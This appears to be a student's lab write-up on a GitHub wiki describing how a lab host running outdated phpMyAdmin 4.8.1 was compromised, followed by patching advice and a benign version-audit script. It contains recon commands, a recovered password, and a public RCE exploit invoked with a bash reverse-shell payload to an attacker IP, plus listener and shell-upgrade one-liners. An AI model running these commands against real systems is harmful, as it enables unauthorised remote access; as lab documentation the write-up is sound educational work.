Exploiting Nancurunir - tmansfield42/Tech-Journal GitHub Wiki

  • Target IP Address

nslookup [what you're looking up] [DNS server]

nslookup -vc nancurunir.shire.org 10.0.5.22

  • Open Ports

nmap -sV -O -A 10.0.5.31

  • Discovered Vulnerabilities

Found an Apache server running phpMyAdmin 4.8.1.

searchsploit phpmyadmin 4.8.1

Found an RCE exploit at /php/webapps/50457.py and copied it locally with this command:

searchsploit -m /php/webapps/50457.py

  • How you achieved a foothold

Log in to the phpMyAdmin site; the hashed password can be found in the mysql database, in the "user" table.

password was gandalfthewhite

From here you can remotely execute a reverse shell pretty easily:

On the Kali box: nc -nvlp <port>

Using the RCE exploit: python3 50457.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass "bash -c 'bash -i >& /dev/tcp/10.0.17.86/4486 0>&1'"

then just find the flags.

  • How might the vulnerabilities be mitigated by the system administrator?

Keep all active services up to date; this was exploited because of a badly outdated version of phpMyAdmin (4.8.1).
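The mitigation above comes down to knowing which hosts run a version below your patch baseline. The following is an added example (not code from this journal): a small inventory audit that compares versions numerically rather than as strings, since a lexical comparison ranks "4.10.0" below "4.8.1". The inventory rows and the MIN_VERSION baseline are constructed sample data; the baseline numbers are placeholders, not vendor-stated fix versions, and should be taken from each vendor's security advisories.

```python
"""Patch-level audit for a service inventory (added example, not from the original journal)."""
import re
from typing import List, Tuple

VersionTuple = Tuple[int, ...]

# Placeholder baseline: the lowest version your patch policy accepts per product.
# These numbers are assumptions for the example, not vendor-stated fix versions.
MIN_VERSION = {
    "phpmyadmin": "4.9.0",
    "apache": "2.4.41",
}

# Constructed inventory, e.g. exported from a CMDB or scraped from nmap -sV output.
INVENTORY = [
    ("10.0.5.31", "phpmyadmin", "4.8.1"),
    ("10.0.5.31", "apache", "2.4.41"),
    ("10.0.5.40", "phpmyadmin", "4.10.0"),
    ("10.0.5.41", "phpmyadmin", "4.9.0-rc1"),
]


def parse_version(text: str) -> VersionTuple:
    """Turn '4.8.1' or '4.9.0-rc1' into a tuple of ints that orders correctly.

    Pre-release suffixes (alpha, beta, rc) sort below the final release of the
    same number; missing components are padded so that 4.9 == 4.9.0.
    """
    m = re.match(r"^(\d+(?:\.\d+)*)(?:-(alpha|beta|rc)(\d*))?$", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums += (0,) * (3 - len(nums))
    if m.group(2):
        stage = {"alpha": 1, "beta": 2, "rc": 3}[m.group(2)]
        return nums + (stage, int(m.group(3) or 0))
    return nums + (9, 0)  # a final release sorts above any pre-release


def is_outdated(product: str, version: str) -> bool:
    """True when the installed version is below the policy baseline."""
    baseline = MIN_VERSION.get(product.lower())
    if baseline is None:
        return False  # no policy for this product, so nothing to flag
    return parse_version(version) < parse_version(baseline)


def audit(inventory) -> List[Tuple[str, str, str]]:
    """Return the (host, product, version) rows that fall below the baseline."""
    return [(h, p, v) for h, p, v in inventory if is_outdated(p, v)]


if __name__ == "__main__":
    for host, product, version in audit(INVENTORY):
        print(f"{host}: {product} {version} is below {MIN_VERSION[product]}, schedule an update")
```

Run it against a real export by replacing INVENTORY; the 4.9.0-rc1 row shows why pre-release tags need explicit handling, and the 4.10.0 row is the case a plain string comparison gets wrong.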

Troubleshooting

Had a problem where I couldn't su to gandalf and it was because I was using a reverse shell. Type this to make a usable terminal:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Got stumped trying to find an exploit; went through like 4 potential Apache exploits but ended up using the hint.
